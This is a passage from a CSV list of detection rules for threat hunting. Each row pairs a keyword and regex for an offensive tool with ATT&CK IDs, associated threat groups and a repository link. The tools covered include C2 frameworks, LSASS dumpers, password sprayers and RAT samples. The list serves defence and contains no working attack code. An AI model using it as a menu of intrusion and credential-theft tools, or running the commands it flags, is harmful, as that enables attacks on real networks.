Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59935"
"*spawnto */path *",".{0,1000}spawnto\s.{0,1000}\/path\s.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","59936"
"*spawnto_x64 -Application *",".{0,1000}spawnto_x64\s\-Application\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","59937"
"*'spawnto_x64'*",".{0,1000}\'spawnto_x64\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","59938"
"*spawnto_x64.py*",".{0,1000}spawnto_x64\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","59939"
"*spawnto_x86 -Application*",".{0,1000}spawnto_x86\s\-Application.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","59940"
"*'spawnto_x86'*",".{0,1000}\'spawnto_x86\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","59941"
"*spawnto_x86.py*",".{0,1000}spawnto_x86\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","59942"
"*specialtokengroupprivs.py*",".{0,1000}specialtokengroupprivs\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","59943"
"*Specified user is a Domain Admin. Use the -Force switch to override*",".{0,1000}Specified\suser\sis\sa\sDomain\sAdmin\.\sUse\sthe\s\-Force\sswitch\sto\soverride.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","59944"
"*Specified user is a Enterprise Admin. Use the -Force switch to override*",".{0,1000}Specified\suser\sis\sa\sEnterprise\sAdmin\.\sUse\sthe\s\-Force\sswitch\sto\soverride.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","59945"
"*Specify domain for enumeration*",".{0,1000}Specify\sdomain\sfor\senumeration.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","59946"
"*Specify -instanceid 1337*Specify -source 'Persistence*",".{0,1000}Specify\s\-instanceid\s1337.{0,1000}Specify\s\-source\s\'Persistence.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","59947"
"*SpecterOps/Nemesis*",".{0,1000}SpecterOps\/Nemesis.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","59948"
"*Specula C2*",".{0,1000}Specula\sC2.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","59949"
"*SpeculaC2*",".{0,1000}SpeculaC2.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","59950"
"*Spel_RCE_Bash_EXP.py*",".{0,1000}Spel_RCE_Bash_EXP\.py.{0,1000}","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59951"
"*Spel_RCE_POC.py*",".{0,1000}Spel_RCE_POC\.py.{0,1000}","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","N/A","","N/A","","","","59952"
"*spiderfoot -l 127.0.0.1:*",".{0,1000}spiderfoot\s\-l\s127\.0\.0\.1\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59953"
"*spiderfoot-cli -s http*",".{0,1000}spiderfoot\-cli\s\-s\shttp.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59954"
"*-SpiderFoot-correlations.csv*",".{0,1000}\-SpiderFoot\-correlations\.csv.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","59955"
"*spiderfoot-master*",".{0,1000}spiderfoot\-master.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A","59956"
"*SpiderLabs/DoHC2*",".{0,1000}SpiderLabs\/DoHC2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","59957"
"*SpiderLabs/Responder*",".{0,1000}SpiderLabs\/Responder.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","59958"
"*spindrift.py *--target *",".{0,1000}spindrift\.py\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","59959"
"*spindrift.py --domain*",".{0,1000}spindrift\.py\s\-\-domain.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","59960"
"*Spins up catspin using Api Gateway proxy*",".{0,1000}Spins\sup\scatspin\susing\sApi\sGateway\sproxy.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","59961"
"*Splinter-RAT [Aardvark] vers 1.0 Developed by @Carpenter1010*",".{0,1000}Splinter\-RAT\s\[Aardvark\]\svers\s1\.0\sDeveloped\sby\s\@Carpenter1010.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","59970"
"*sploitus.com/exploit?id=6C1081C5-7938-5E83-9079-719C1B071FB5*",".{0,1000}sploitus\.com\/exploit\?id\=6C1081C5\-7938\-5E83\-9079\-719C1B071FB5.{0,1000}","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z","59971"
"*splunk/upload_app_exec/*",".{0,1000}splunk\/upload_app_exec\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59972"
"*splunk_whisperer.py*",".{0,1000}splunk_whisperer\.py.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003  - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","59973"
"*splunk_whisperer-master*",".{0,1000}splunk_whisperer\-master.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003  - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","59974"
"*SplunkWhisperer2-master*",".{0,1000}SplunkWhisperer2\-master.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003  - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","59975"
"*-spn * -clsid * -shadowcred*",".{0,1000}\-spn\s.{0,1000}\s\-clsid\s.{0,1000}\s\-shadowcred.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","59976"
"*SPN:SharpRoast.exe*",".{0,1000}SPN\:SharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","59977"
"*spnroast_*.txt*",".{0,1000}spnroast_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","59978"
"*Spoof extensions/Spoofer.exe*",".{0,1000}Spoof\sextensions\/Spoofer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","59979"
"*spoof.py *.dll*",".{0,1000}spoof\.py\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","0","N/A","N/A","9","1","60","7","2025-03-04T14:14:15Z","2023-10-18T14:34:38Z","59980"
"*spoof/llmnr/llmnr_response*",".{0,1000}spoof\/llmnr\/llmnr_response.{0,1000}","offensive_tool_keyword","metasploit","llmnr spoofing used by Dispossessor ransomware group","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59981"
"*spoof_wani*",".{0,1000}spoof_wani.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","59982"
"*spoof_wlan_creds*",".{0,1000}spoof_wlan_creds.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","59983"
"*--spoof-callstack *",".{0,1000}\-\-spoof\-callstack\s.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","59984"
"*SpooferHostsIgnore*",".{0,1000}SpooferHostsIgnore.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59985"
"*SpooferHostsReply*",".{0,1000}SpooferHostsReply.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59986"
"*SpooferIP*",".{0,1000}SpooferIP.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - 